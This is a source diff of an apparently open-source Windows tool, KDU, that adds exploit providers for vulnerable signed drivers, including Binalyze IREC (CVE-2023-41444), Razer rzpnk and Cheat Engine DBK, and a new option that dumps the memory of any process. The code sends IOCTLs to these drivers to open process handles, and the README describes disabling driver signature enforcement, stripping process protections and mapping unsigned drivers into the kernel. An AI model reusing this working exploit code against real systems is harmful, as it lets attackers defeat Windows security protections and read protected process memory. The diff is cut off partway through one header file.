diff --git a/README.md b/README.md
index 6641d9b..74c127e 100644
--- a/README.md
+++ b/README.md
@@ -24,6 +24,7 @@ It features:
###### KDU -prv ProviderID
###### KDU -ps ProcessID
###### KDU -pse Commandline
+###### KDU -dmp ProcessID
###### KDU -dse value
###### KDU -map filename
* -list - list currently available providers;
@@ -31,6 +32,7 @@ It features:
* -prv - optional, select vulnerability driver provider;
* -ps - modify process object of given ProcessID, downgrading any protections;
* -pse - launch program as ProtectedProcessLight-AntiMalware (PPL);
+* -dmp - dump virtual memory of the given process;
* -dse - write user defined value to the system DSE state flags;
* -map - map driver to the kernel and execute it entry point, this command have dependencies listed below;
* -scv version - optional, select shellcode version, default 1;
@@ -145,6 +147,9 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 38 | Pavel Yosifovich | KRegExp | Kernel Registry Explorer | Original | Undefined | |
| 39 | Inspect Element LTD | EchoDrv | Echo AntiCheat (spyware) | Original | Undefined | |
| 40 | NVidia | nvoclock | NVidia System Utility Driver | Original | 7.0.0.32 | |
+| 41 | Binalyze | IREC | Binalyze DFIR | Original | 3.11.0 | |
+| 42 | DavidXXW | PhyDMACC | SLIC ToolKit | WINRING0 | 1.2.0 | |
+| 43 | Razer | rzpnk | Razer Synapse | Original | 2.20.15.1104 | |
###### *At commit time, data maybe inaccurate.
@@ -212,6 +217,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
* LOLDrivers, https://www.loldrivers.io
* ECHOH NO, https://github.com/kite03/echoac-poc/
* NVDrv, https://github.com/zer0condition/NVDrv
+* CVE-2023-41444, https://blog.dru1d.ninja/windows-driver-exploit-development-irec-sys-a5eb45093945
# Wormhole drivers code
diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj
index 3b54b1a..ee1d08d 100644
--- a/Source/Hamakaze/KDU.vcxproj
+++ b/Source/Hamakaze/KDU.vcxproj
@@ -138,6 +138,7 @@
+
@@ -155,6 +156,7 @@
+
@@ -197,6 +199,7 @@
+
@@ -215,6 +218,7 @@
+
diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters
index 7fc0925..9bfc8e3 100644
--- a/Source/Hamakaze/KDU.vcxproj.filters
+++ b/Source/Hamakaze/KDU.vcxproj.filters
@@ -213,6 +213,12 @@
Source Files\idrv
+
+ Source Files\idrv
+
+
+ Source Files\idrv
+
@@ -398,6 +404,12 @@
Source Files\idrv
+
+ Source Files\idrv
+
+
+ Source Files\idrv
+
diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
index 1a53fb5..d1f34ae 100644
--- a/Source/Hamakaze/KDU.vcxproj.user
+++ b/Source/Hamakaze/KDU.vcxproj.user
@@ -1,11 +1,11 @@

- -test
+ -prv 43 -dmp 440
WindowsLocalDebugger
- -prv 40 -dse 6
+ -prv 42 -map c:\install\dummy2.sys
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Hamakaze/idrv/binalyze.cpp b/Source/Hamakaze/idrv/binalyze.cpp
new file mode 100644
index 0000000..1481722
--- /dev/null
+++ b/Source/Hamakaze/idrv/binalyze.cpp
@@ -0,0 +1,56 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2023
+*
+* TITLE: BINALYZE.CPP
+*
+* VERSION: 1.40
+*
+* DATE: 20 Oct 2023
+*
+* Binalyze driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/binalyze.h"
+
+//
+// Based on CVE-2023-41444
+//
+
+/*
+* BeDrvOpenProcess
+*
+* Purpose:
+*
+* Open process via Binalyze driver.
+*
+*/
+BOOL WINAPI BeDrvOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle)
+{
+ UNREFERENCED_PARAMETER(DesiredAccess);
+
+ BOOL bResult = FALSE;
+ DWORD data = HandleToUlong(ProcessId);
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_IREC_OPEN_PROCESS,
+ &data,
+ sizeof(data),
+ &data,
+ sizeof(data));
+
+ *ProcessHandle = UlongToHandle(data);
+
+ return bResult;
+}
diff --git a/Source/Hamakaze/idrv/binalyze.h b/Source/Hamakaze/idrv/binalyze.h
new file mode 100644
index 0000000..b60e818
--- /dev/null
+++ b/Source/Hamakaze/idrv/binalyze.h
@@ -0,0 +1,32 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2023
+*
+* TITLE: BINALYZE.H
+*
+* VERSION: 1.40
+*
+* DATE: 20 Oct 2023
+*
+* Binalyze driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+#define IREC_DEVICE_TYPE (DWORD)0x8001
+#define IREC_FUNCTION_OPEN_PROCESS (DWORD)0x80A
+
+#define IOCTL_IREC_OPEN_PROCESS \
+ CTL_CODE(IREC_DEVICE_TYPE, IREC_FUNCTION_OPEN_PROCESS, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80012028
+
+BOOL WINAPI BeDrvOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/dbk.cpp b/Source/Hamakaze/idrv/dbk.cpp
index 497f5e9..176143a 100644
--- a/Source/Hamakaze/idrv/dbk.cpp
+++ b/Source/Hamakaze/idrv/dbk.cpp
@@ -4,9 +4,9 @@
*
* TITLE: DBK.CPP
*
-* VERSION: 1.32
+* VERSION: 1.40
*
-* DATE: 10 Jun 2023
+* DATE: 20 Oct 2023
*
* Cheat Engine's DBK driver routines.
*
@@ -651,3 +651,36 @@ BOOL DbkControlDSE(
return bResult;
}
+
+/*
+* DbkOpenProcess
+*
+* Purpose:
+*
+* Open process via CheatEngine driver.
+*
+*/
+BOOL WINAPI DbkOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle)
+{
+ UNREFERENCED_PARAMETER(DesiredAccess);
+
+ struct {
+ HANDLE ProcessHandle;
+ BYTE Special;
+ } outputBuffer = { NULL, 0 };
+
+ BOOL bResult = supCallDriver(DeviceHandle,
+ IOCTL_CE_OPENPROCESS,
+ &ProcessId,
+ sizeof(DWORD),
+ &outputBuffer,
+ sizeof(outputBuffer));
+
+ *ProcessHandle = outputBuffer.ProcessHandle;
+
+ return bResult;
+}
diff --git a/Source/Hamakaze/idrv/dbk.h b/Source/Hamakaze/idrv/dbk.h
index 4284737..d6acb9c 100644
--- a/Source/Hamakaze/idrv/dbk.h
+++ b/Source/Hamakaze/idrv/dbk.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: DBK.H
*
-* VERSION: 1.20
+* VERSION: 1.40
*
-* DATE: 14 Feb 2022
+* DATE: 20 Oct 2023
*
* Cheat Engine's DBK driver interface header.
*
@@ -25,6 +25,7 @@
#define DBK_DEVICE_TYPE (DWORD)FILE_DEVICE_UNKNOWN
+#define DBK_FUNC_OPEN_PROCESS (DWORD)0x0802
#define DBK_FUNC_ALLOCATEMEM_NONPAGED (DWORD)0x0826
#define DBK_FUNC_FREEMEM (DWORD)0x084C
#define DBK_FUNC_MAP_MEMORY (DWORD)0x084D
@@ -46,6 +47,10 @@
#define IOCTL_CE_EXECUTE_CODE \
CTL_CODE(DBK_DEVICE_TYPE, DBK_FUNC_EXECUTE_CODE, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
+#define IOCTL_CE_OPENPROCESS \
+ CTL_CODE(DBK_DEVICE_TYPE, DBK_FUNC_OPEN_PROCESS, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
+
+
BOOL DbkStartVulnerableDriver(
_In_ KDU_CONTEXT* Context);
@@ -57,3 +62,9 @@ BOOL DbkControlDSE(
_In_ PKDU_CONTEXT Context,
_In_ ULONG DSEValue,
_In_ ULONG_PTR Address);
+
+BOOL WINAPI DbkOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/echodrv.cpp b/Source/Hamakaze/idrv/echodrv.cpp
index b69291f..ab0e920 100644
--- a/Source/Hamakaze/idrv/echodrv.cpp
+++ b/Source/Hamakaze/idrv/echodrv.cpp
@@ -4,9 +4,9 @@
*
* TITLE: ECHODRV.CPP
*
-* VERSION: 1.33
+* VERSION: 1.40
*
-* DATE: 16 Jul 2023
+* DATE: 21 Oct 2023
*
* Inspect Element LTD spyware (anticheat) driver interface.
*
@@ -126,7 +126,7 @@ BOOL WINAPI EchoDrvRegisterDriver(
BOOL bResult;
ECHODRV_REGISTER regRequest;
- ECHODRV_VALIDATE_PROCESS procRequest;
+ ECHODRV_OPENPROCESS_REQUEST procRequest;
RtlSecureZeroMemory(®Request, sizeof(regRequest));
@@ -190,3 +190,37 @@ BOOL WINAPI EchoDrvUnregisterDriver(
return TRUE;
}
+
+/*
+* EchoDrvOpenProcess
+*
+* Purpose:
+*
+* Open process via Echo driver.
+*
+*/
+BOOL WINAPI EchoDrvOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle)
+{
+ BOOL bResult = FALSE;
+ ECHODRV_OPENPROCESS_REQUEST procRequest;
+
+ RtlSecureZeroMemory(&procRequest, sizeof(procRequest));
+
+ procRequest.ProcessId = HandleToUlong(ProcessId);
+ procRequest.DesiredAccess = DesiredAccess;
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_ECHODRV_OPEN_PROCESS,
+ &procRequest,
+ sizeof(procRequest),
+ &procRequest,
+ sizeof(procRequest));
+
+ *ProcessHandle = procRequest.ProcessHandle;
+
+ return bResult;
+}
diff --git a/Source/Hamakaze/idrv/echodrv.h b/Source/Hamakaze/idrv/echodrv.h
index adee8c8..87487f7 100644
--- a/Source/Hamakaze/idrv/echodrv.h
+++ b/Source/Hamakaze/idrv/echodrv.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2023
*
* TITLE: ECHODRV.H
*
-* VERSION: 1.33
+* VERSION: 1.40
*
-* DATE: 16 Jul 2023
+* DATE: 21 Oct 2023
*
* Inspect Element LTD spyware (anticheat) driver interface header.
*
@@ -47,13 +47,13 @@ typedef struct _ECHODRV_REGISTER {
_Out_ DWORD UniqCode; //0x1000 for call
} ECHODRV_REGISTER, * PECHODRV_REGISTER;
-typedef struct _ECHODRV_VALIDATE_PROCESS {
+typedef struct _ECHODRV_OPENPROCESS_REQUEST {
_In_ DWORD ProcessId;
_In_ ACCESS_MASK DesiredAccess;
_Out_ HANDLE ProcessHandle;
_Out_ BOOL bSuccess;
_Out_ DWORD UniqCode; //0x1001 for call
-} ECHODRV_VALIDATE_PROCESS, * PECHODRV_VALIDATE_PROCESS;
+} ECHODRV_OPENPROCESS_REQUEST, * PECHODRV_OPENPROCESS_REQUEST;
typedef struct _ECHODRV_COPYVM_REQUEST {
_In_ HANDLE ProcessHandle;
@@ -84,3 +84,9 @@ BOOL WINAPI EchoDrvWriteVirtualMemory(
_In_ ULONG_PTR VirtualAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+
+BOOL WINAPI EchoDrvOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/kph.cpp b/Source/Hamakaze/idrv/kph.cpp
index 1a6947a..ad5137b 100644
--- a/Source/Hamakaze/idrv/kph.cpp
+++ b/Source/Hamakaze/idrv/kph.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: KPH.CPP
*
-* VERSION: 1.20
+* VERSION: 1.40
*
-* DATE: 08 Feb 2022
+* DATE: 20 Oct 2023
*
* KProcessHacker2 driver routines.
*
@@ -292,14 +292,14 @@ BOOL KphpDuplicateHandle(
}
/*
-* KphpOpenProcess
+* KphOpenProcess
*
* Purpose:
*
* Open process handle via KPH driver request.
*
*/
-BOOL KphpOpenProcess(
+BOOL WINAPI KphOpenProcess(
_In_ HANDLE DeviceHandle,
_In_ HANDLE ProcessId,
_In_ ACCESS_MASK DesiredAccess,
@@ -339,7 +339,7 @@ BOOL WINAPI KphRegisterDriver(
UNREFERENCED_PARAMETER(Param);
return supOpenPhysicalMemory(DeviceHandle,
- (pfnOpenProcessCallback)KphpOpenProcess,
+ (pfnOpenProcessCallback)KphOpenProcess,
(pfnDuplicateHandleCallback)KphpDuplicateHandle,
&g_KphPhysicalMemorySection);
}
diff --git a/Source/Hamakaze/idrv/kph.h b/Source/Hamakaze/idrv/kph.h
index 478320d..ac43a81 100644
--- a/Source/Hamakaze/idrv/kph.h
+++ b/Source/Hamakaze/idrv/kph.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: KPH.H
*
-* VERSION: 1.20
+* VERSION: 1.40
*
-* DATE: 08 Feb 2022
+* DATE: 20 Oct 2023
*
* KProcessHacker2 driver interface header.
*
@@ -85,3 +85,9 @@ BOOL WINAPI KphWriteKernelVirtualMemory(
_In_ ULONG_PTR Address,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+
+BOOL WINAPI KphOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/procexp.cpp b/Source/Hamakaze/idrv/procexp.cpp
index a3ab4b1..44e83b5 100644
--- a/Source/Hamakaze/idrv/procexp.cpp
+++ b/Source/Hamakaze/idrv/procexp.cpp
@@ -4,9 +4,9 @@
*
* TITLE: PROCEXP.CPP
*
-* VERSION: 1.32
+* VERSION: 1.40
*
-* DATE: 10 Jun 2023
+* DATE: 20 Oct 2023
*
* Process Explorer driver routines.
*
@@ -277,14 +277,14 @@ BOOL PexpDuplicateHandle(
}
/*
-* PexpOpenProcess
+* PexOpenProcess
*
* Purpose:
*
* Open process handle via ProcExp driver request.
*
*/
-BOOL PexpOpenProcess(
+BOOL WINAPI PexOpenProcess(
_In_ HANDLE DeviceHandle,
_In_ HANDLE ProcessId,
_In_ ACCESS_MASK DesiredAccess,
@@ -324,7 +324,7 @@ BOOL WINAPI PexRegisterDriver(
context->Victim = &g_ProcExpVictimSelf;
return supOpenPhysicalMemory(DeviceHandle,
- PexpOpenProcess,
+ PexOpenProcess,
PexpDuplicateHandle,
&g_PexPhysicalMemorySection);
}
diff --git a/Source/Hamakaze/idrv/procexp.h b/Source/Hamakaze/idrv/procexp.h
index 64d3c34..dce18ad 100644
--- a/Source/Hamakaze/idrv/procexp.h
+++ b/Source/Hamakaze/idrv/procexp.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: PROCEXP.H
*
-* VERSION: 1.20
+* VERSION: 1.40
*
-* DATE: 08 Feb 2022
+* DATE: 20 Oct 2023
*
* Process Explorer driver interface header.
*
@@ -80,3 +80,9 @@ BOOL WINAPI PexWriteKernelVirtualMemory(
_In_ ULONG_PTR Address,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+
+BOOL WINAPI PexOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/rzpnk.cpp b/Source/Hamakaze/idrv/rzpnk.cpp
index 418cdee..11e81bc 100644
--- a/Source/Hamakaze/idrv/rzpnk.cpp
+++ b/Source/Hamakaze/idrv/rzpnk.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: RZPNK.CPP
*
-* VERSION: 1.00
+* VERSION: 1.40
*
-* DATE: 02 Feb 2020
+* DATE: 20 Oct 2023
*
* Razer Overlay Support driver routines.
*
@@ -20,69 +20,10 @@
#include "global.h"
#include "idrv/rzpnk.h"
-/*{
-
-//
-// Unfortunately all what it can - read/write to first 4gb of phys RAM.
-// Exploitation of this driver in CVE-2017-14398 was a PURELY accidential.
-//
- KDU_MAX_NTBUILDNUMBER,
- IDR_RAZER,
- 0,
- (LPWSTR)L"CVE-2017-9769, CVE-2017-9770",
- (LPWSTR)L"Razer",
- (LPWSTR)L"47CD78C9-64C3-47C2-B80F-677B887CF095",
- (provReadKernelVM)KDUProviderStub,
- (provWriteKernelVM)KDUProviderStub,
- (provVirtualToPhysical)KDUProviderStub,
- (provReadControlRegister)KDUProviderStub,
- (provReadPhysicalMemory)RazerReadPhysicalMemory,
- (provWritePhysicalMemory)RazerWritePhysicalMemory,
- (provRegisterDriver)RazerRegisterDriver,
- (provUnregisterDriver)RazerUnregisterDriver
-}*/
-
//
-// Based on CVE-2017-9769, CVE-2017-9770.
+// Based on CVE-2017-9769.
//
-HANDLE g_PhysicalMemorySection = NULL;
-
-/*
-* RazerCallDriver
-*
-* Purpose:
-*
-* Call Razer Rzpnk driver.
-*
-*/
-BOOL RazerCallDriver(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG IoControlCode,
- _In_ PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _In_opt_ PVOID OutputBuffer,
- _In_opt_ ULONG OutputBufferLength)
-{
- BOOL bResult = FALSE;
- IO_STATUS_BLOCK ioStatus;
-
- NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle,
- NULL,
- NULL,
- NULL,
- &ioStatus,
- IoControlCode,
- InputBuffer,
- InputBufferLength,
- OutputBuffer,
- OutputBufferLength);
-
- bResult = NT_SUCCESS(ntStatus);
- SetLastError(RtlNtStatusToDosError(ntStatus));
- return bResult;
-}
-
/*
* RazerOpenProcess
*
@@ -91,294 +32,28 @@ BOOL RazerCallDriver(
* Call ZwOpenProcess via razer driver request.
*
*/
-BOOL RazerOpenProcess(
+BOOL WINAPI RazerOpenProcess(
_In_ HANDLE DeviceHandle,
_In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
_Out_ PHANDLE ProcessHandle
)
{
BOOL bResult;
RAZER_OPEN_PROCESS request;
+ UNREFERENCED_PARAMETER(DesiredAccess);
+
request.ProcessId = ProcessId;
request.ProcessHandle = NULL;
- bResult = RazerCallDriver(DeviceHandle,
+ bResult = supCallDriver(DeviceHandle,
IOCTL_RZPNK_OPEN_PROCESS,
&request,
sizeof(request),
&request,
sizeof(request));
- if (bResult) {
- *ProcessHandle = request.ProcessHandle;
- }
-
- return bResult;
-}
-
-/*
-* RazerMapMemory
-*
-* Purpose:
-*
-* Map physical memory through \Device\PhysicalMemory.
-*
-*/
-PVOID RazerMapMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _In_ ULONG ViewSize)
-{
- BOOL bResult = FALSE;
- DWORD dwError = ERROR_SUCCESS;
- RAZER_MAP_SECTION_INFO request;
- HANDLE selfHandle;
-
- UNREFERENCED_PARAMETER(PhysicalAddress);
-
- CLIENT_ID clientID;
-
- clientID.UniqueProcess = UlongToHandle(GetCurrentProcessId());
- clientID.UniqueThread = NULL;
-
- OBJECT_ATTRIBUTES dummy;
- InitializeObjectAttributes(&dummy, NULL, 0, NULL, NULL);
-
- if (!NT_SUCCESS(NtOpenProcess(&selfHandle, PROCESS_ALL_ACCESS, &dummy, &clientID)))
- return NULL;
-
- RtlSecureZeroMemory(&request, sizeof(request));
- request.ViewCommitSize = ViewSize;
- request.ProcessHandle = selfHandle;
- request.ProcessId = clientID.UniqueProcess;
- request.SectionHandle = g_PhysicalMemorySection;
-
- bResult = RazerCallDriver(DeviceHandle,
- IOCTL_RZPNK_MAP_SECTION_USER_MODE,
- &request,
- sizeof(request),
- &request,
- sizeof(request));
-
- if (!bResult) {
- dwError = GetLastError();
- }
- else {
- dwError = RtlNtStatusToDosError(request.Status);
- }
-
- CloseHandle(selfHandle);
-
- SetLastError(dwError);
- return request.MappedBaseAddress;
-}
-
-/*
-* RazerReadWritePhysicalMemory
-*
-* Purpose:
-*
-* Read/Write virtual memory via Razer.
-*
-*/
-BOOL WINAPI RazerReadWritePhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR Address,
- _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
- _In_ ULONG NumberOfBytes,
- _In_ BOOLEAN DoWrite)
-{
- BOOL bResult = FALSE;
- DWORD dwError = ERROR_SUCCESS;
-
- ULONG ViewSize;
-
- if ((Address + NumberOfBytes) > MAXDWORD32)
- return FALSE;
-
- ViewSize = Address + NumberOfBytes;
-
- PVOID mappedSection = RazerMapMemory(DeviceHandle, Address, ViewSize);
- if (mappedSection) {
-
- if (DoWrite) {
- RtlCopyMemory(RtlOffsetToPointer(mappedSection, Address), Buffer, NumberOfBytes);
- }
- else {
- RtlCopyMemory(Buffer, RtlOffsetToPointer(mappedSection, Address), NumberOfBytes);
- }
-
- NtUnmapViewOfSection(NtCurrentProcess(), mappedSection);
-
- bResult = TRUE;
- }
-
- SetLastError(dwError);
- return bResult;
-}
-
-/*
-* RazerReadPhysicalMemory
-*
-* Purpose:
-*
-* Read from physical memory.
-*
-*/
-BOOL WINAPI RazerReadPhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _In_ PVOID Buffer,
- _In_ ULONG NumberOfBytes)
-{
- return RazerReadWritePhysicalMemory(DeviceHandle,
- PhysicalAddress,
- Buffer,
- NumberOfBytes,
- FALSE);
-}
-
-/*
-* RazerWritePhysicalMemory
-*
-* Purpose:
-*
-* Write to physical memory.
-*
-*/
-BOOL WINAPI RazerWritePhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
- _In_ ULONG NumberOfBytes)
-{
- return RazerReadWritePhysicalMemory(DeviceHandle,
- PhysicalAddress,
- Buffer,
- NumberOfBytes,
- TRUE);
-}
-
-/*
-* RazerRegisterDriver
-*
-* Purpose:
-*
-* Initialize Razer specific global variable (section handle value).
-* Must be called before accessing Kernel R/W primitives.
-*
-*/
-BOOL WINAPI RazerRegisterDriver(
- _In_ HANDLE DeviceHandle)
-{
- BOOL bResult = FALSE;
- ULONG SectionObjectType = (ULONG)-1;
- HANDLE processHandle = NULL;
- HANDLE sectionHandle = NULL;
- PSYSTEM_HANDLE_INFORMATION_EX handleArray = NULL;
- UNICODE_STRING ustr;
- OBJECT_ATTRIBUTES obja;
-
- do {
- //
- // Open System process.
- //
- if (!RazerOpenProcess(DeviceHandle, (HANDLE)SYSTEM_PID_MAGIC, &processHandle))
- break;
-
- //
- // Open dummy section handle.
- //
- RtlInitUnicodeString(&ustr, L"\\KnownDlls\\kernel32.dll");
- InitializeObjectAttributes(&obja, &ustr, OBJ_CASE_INSENSITIVE, NULL, NULL);
- if (!NT_SUCCESS(NtOpenSection(§ionHandle, SECTION_QUERY, &obja)))
- break;
-
- handleArray = (PSYSTEM_HANDLE_INFORMATION_EX)supGetSystemInfo(SystemExtendedHandleInformation);
- if (handleArray == NULL)
- break;
-
- ULONG i;
- DWORD currentProcessId = GetCurrentProcessId();
-
- //
- // Find dummy section handle and remember it object type index.
- //
- for (i = 0; i < handleArray->NumberOfHandles; i++) {
- if (handleArray->Handles[i].UniqueProcessId == currentProcessId &&
- handleArray->Handles[i].HandleValue == (ULONG_PTR)sectionHandle)
- {
- SectionObjectType = handleArray->Handles[i].ObjectTypeIndex;
- break;
- }
- }
-
- NtClose(sectionHandle);
- sectionHandle = NULL;
-
- if (SectionObjectType == (ULONG)-1)
- break;
-
- HANDLE testHandle = NULL;
-
- //
- // Some heur to find \Device\PhysicalMemory section.
- //
- for (i = 0; i < handleArray->NumberOfHandles; i++) {
- if (handleArray->Handles[i].UniqueProcessId == SYSTEM_PID_MAGIC &&
- handleArray->Handles[i].ObjectTypeIndex == (ULONG_PTR)SectionObjectType &&
- handleArray->Handles[i].GrantedAccess == SECTION_ALL_ACCESS)
- {
- testHandle = (HANDLE)(SYSTEM_USER_TO_KERNEL_HANDLE + handleArray->Handles[i].HandleValue);
- g_PhysicalMemorySection = testHandle;
-
- PVOID testBuffer = RazerMapMemory(DeviceHandle, 0, 0x100000); //1mb
- if (testBuffer) {
-
- ULONG_PTR PML4 = supGetPML4FromLowStub1M((ULONG_PTR)testBuffer);
-
- NtUnmapViewOfSection(NtCurrentProcess(), testBuffer);
-
- //
- // PML4 found, section looks legit.
- //
- if (PML4)
- break;
- }
- g_PhysicalMemorySection = NULL;
- }
- }
-
- //
- // Remember section handle if found and valid.
- //
- if (testHandle) {
- g_PhysicalMemorySection = testHandle;
- bResult = TRUE;
- }
-
- } while (FALSE);
-
- if (sectionHandle) NtClose(sectionHandle);
- if (processHandle) NtClose(processHandle);
- if (handleArray) supHeapFree(handleArray);
-
+ *ProcessHandle = request.ProcessHandle;
return bResult;
}
-
-/*
-* RazerUnregisterDriver
-*
-* Purpose:
-*
-* Free razer driver related resources.
-*
-*/
-BOOL WINAPI RazerUnregisterDriver(
- _In_ HANDLE DeviceHandle)
-{
- UNREFERENCED_PARAMETER(DeviceHandle);
-
- return TRUE;
-}
diff --git a/Source/Hamakaze/idrv/rzpnk.h b/Source/Hamakaze/idrv/rzpnk.h
index 3c5db59..177ed9e 100644
--- a/Source/Hamakaze/idrv/rzpnk.h
+++ b/Source/Hamakaze/idrv/rzpnk.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: RZPNK.H
*
-* VERSION: 1.00
+* VERSION: 1.40
*
-* DATE: 02 Feb 2020
+* DATE: 20 Oct 2023
*
* Razer Overlay Support driver interface header.
*
@@ -20,51 +20,23 @@
#pragma once
//
-// Razer Overlay Support driver interface for CVE-2017-9769, CVE-2017-9770.
+// Razer Overlay Support driver interface for CVE-2017-9769.
//
-#define RAZER_DEVICE_TYPE 0x00000022 //DEVICE_TYPE_UNKNOWN
+#define RAZER_DEVICE_TYPE FILE_DEVICE_UNKNOWN
#define RAZER_OPEN_PROCESS_FUNCID (DWORD)0x814
-#define RAZER_MAP_SECTION_FUNCID (DWORD)0x819
-#define IOCTL_RZPNK_OPEN_PROCESS CTL_CODE(RAZER_DEVICE_TYPE, RAZER_OPEN_PROCESS_FUNCID, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x22A050
-#define IOCTL_RZPNK_MAP_SECTION_USER_MODE CTL_CODE(RAZER_DEVICE_TYPE, RAZER_MAP_SECTION_FUNCID, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x22A064
-
-#define SYSTEM_PID_MAGIC 4
-#define SYSTEM_USER_TO_KERNEL_HANDLE 0xffffffff80000000
+#define IOCTL_RZPNK_OPEN_PROCESS \
+ CTL_CODE(RAZER_DEVICE_TYPE, RAZER_OPEN_PROCESS_FUNCID, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x22A050
typedef struct _RAZER_OPEN_PROCESS {
HANDLE ProcessId;
HANDLE ProcessHandle;
} RAZER_OPEN_PROCESS, * PRAZER_OPEN_PROCESS;
-#pragma warning(push)
-#pragma warning(disable:4324) // structure padded due to __declspec(align())
-typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT)_RAZER_MAP_SECTION_INFO {
- HANDLE ProcessHandle;
- HANDLE ProcessId;
- HANDLE SectionHandle;
- PVOID MappedBaseAddress;
- ULONG ViewCommitSize; //WARNING, cannot map above 4GB
- NTSTATUS Status;
-} RAZER_MAP_SECTION_INFO, * PRAZER_MAP_SECTION_INFO;
-#pragma warning(pop)
-
-BOOL WINAPI RazerRegisterDriver(
- _In_ HANDLE DeviceHandle);
-
-BOOL WINAPI RazerUnregisterDriver(
- _In_ HANDLE DeviceHandle);
-
-BOOL WINAPI RazerReadPhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
